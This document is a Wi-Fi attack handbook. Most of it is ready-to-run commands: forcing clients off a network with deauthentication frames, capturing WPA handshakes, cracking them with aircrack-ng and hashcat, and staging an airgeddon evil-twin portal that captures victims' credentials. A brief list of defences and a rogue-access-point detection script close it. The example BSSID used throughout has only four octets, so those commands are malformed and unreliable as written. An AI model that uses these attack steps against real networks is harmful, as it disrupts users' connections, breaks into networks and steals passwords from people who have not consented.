📡 Complete Wi‑Fi Hacking Handbook
🛠️ Prerequisites
- Wireless adapter that supports monitor mode and packet injection (e.g., Alfa AWUS036ACH)
- Kali Linux or similar
- Tools: aircrack‑ng, aireplay‑ng, airodump‑ng, airmon‑ng, hashcat, wifite, airgeddon
1. Capture 4‑Way Handshake
```bash
# Put card in monitor mode
sudo airmon-ng start wlan0

# Scan for networks
sudo airodump-ng wlan0mon

# Capture handshake (replace channel, BSSID, interface)
sudo airodump-ng -c 11 --bssid EA:75:F8:98 -w hack1 wlan0mon

# Deauthenticate client to force reconnection (second terminal)
sudo aireplay-ng -0 5 -a EA:75:F8:98 wlan0mon
```
Use the Wireshark display filter eapol to see the 4 handshake messages.
2. Cracking the Password
Aircrack‑ng
```bash
aircrack-ng hack1-01.cap -w /usr/share/wordlists/rockyou.txt
```
Wifite + Hashcat
```bash
# Use wifite to capture handshake
sudo wifite

# Convert cap to hccapx
cap2hccapx hack1-01.cap hack1.hccapx

# Crack with hashcat
hashcat -m 2500 hack1.hccapx /usr/share/wordlists/rockyou.txt
```
hcxdumptool + hashcat (modern)
```bash
sudo systemctl stop NetworkManager
sudo hcxdumptool -i wlan0 -o dumpfile.pcapng
hcxpcapngtool -o hash.hc22000 dumpfile.pcapng
hashcat -m 22000 hash.hc22000 rockyou.txt
```
3. Evil‑Twin Attack with Airgeddon
```bash
git clone https://github.com/v1s1t0r1sh3r3/airgeddon.git
cd airgeddon
sudo bash airgeddon.sh
```
- Select interface → put in monitor mode
- Choose “Evil Twin attacks” → “Create an Evil Twin”
- Select target AP, choose channel, start captive portal
- Victim connects → credentials captured
4. Packet Injection Test
```bash
# Test injection on specific AP
sudo aireplay-ng -9 -a EA:75:F8:98 wlan0mon
```
🛡️ Mitigation / Defense
- Use WPA3 (if supported) or a strong WPA2 passphrase (>12 chars, complex)
- Disable WPS
- Enable 802.11w (Management Frame Protection)
- Regularly update router firmware
- Monitor for rogue APs
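
One way to approach the rogue-AP monitoring item above, as an added example that is not part of the original handbook: it compares observed beacons against an inventory of authorized APs and flags the open or cloned look-alikes that an evil twin produces. The SSID, BSSIDs, field names and the assumption that authorized APs use fixed channels are all constructed for illustration.

```python
from collections import namedtuple

# One observed beacon, as a sensor or scan export might report it.
# Field names are assumptions for this example, not a tool's real schema.
Beacon = namedtuple("Beacon", "ssid bssid channel security")

# Constructed inventory of the APs we operate, keyed by SSID.
AUTHORIZED = {
    "CorpNet": {
        "security": "WPA2-PSK",
        "aps": {"02:00:00:aa:00:01": 1, "02:00:00:aa:00:02": 11},  # BSSID -> channel
    },
}

def find_rogue_aps(beacons, authorized=AUTHORIZED):
    """Return de-duplicated (bssid, reason) alerts for beacons that advertise
    a managed SSID but do not match the inventory."""
    alerts, seen = [], set()
    for b in beacons:
        policy = authorized.get(b.ssid)
        if policy is None:
            continue  # not one of our SSIDs, out of scope
        bssid = b.bssid.lower()
        if b.security != policy["security"]:
            reason = "security-mismatch"   # e.g. open clone fronting a captive portal
        elif bssid not in policy["aps"]:
            reason = "unknown-bssid"       # our SSID from hardware we do not own
        elif policy["aps"][bssid] != b.channel:
            reason = "channel-mismatch"    # known BSSID seen off its assigned channel
        else:
            continue                       # matches the inventory
        if (bssid, reason) not in seen:
            seen.add((bssid, reason))
            alerts.append((bssid, reason))
    return alerts

# Constructed sample observations (not captured from a real network).
SAMPLE = [
    Beacon("CorpNet", "02:00:00:AA:00:01", 1, "WPA2-PSK"),
    Beacon("CorpNet", "02:00:00:aa:00:02", 11, "WPA2-PSK"),
    Beacon("CorpNet", "02:00:00:bb:00:99", 6, "OPEN"),
    Beacon("CorpNet", "02:00:00:aa:00:01", 6, "WPA2-PSK"),
    Beacon("CorpNet", "02:00:00:cc:00:07", 11, "WPA2-PSK"),
    Beacon("CoffeeShop", "02:00:00:dd:00:01", 6, "OPEN"),
    Beacon("CorpNet", "02:00:00:bb:00:99", 6, "OPEN"),  # repeat beacon, one alert
]

if __name__ == "__main__":
    for bssid, reason in find_rogue_aps(SAMPLE):
        print(f"ALERT {reason}: {bssid}")
```

If the authorized APs use automatic channel selection, drop the channel check or it will alert on every legitimate channel change.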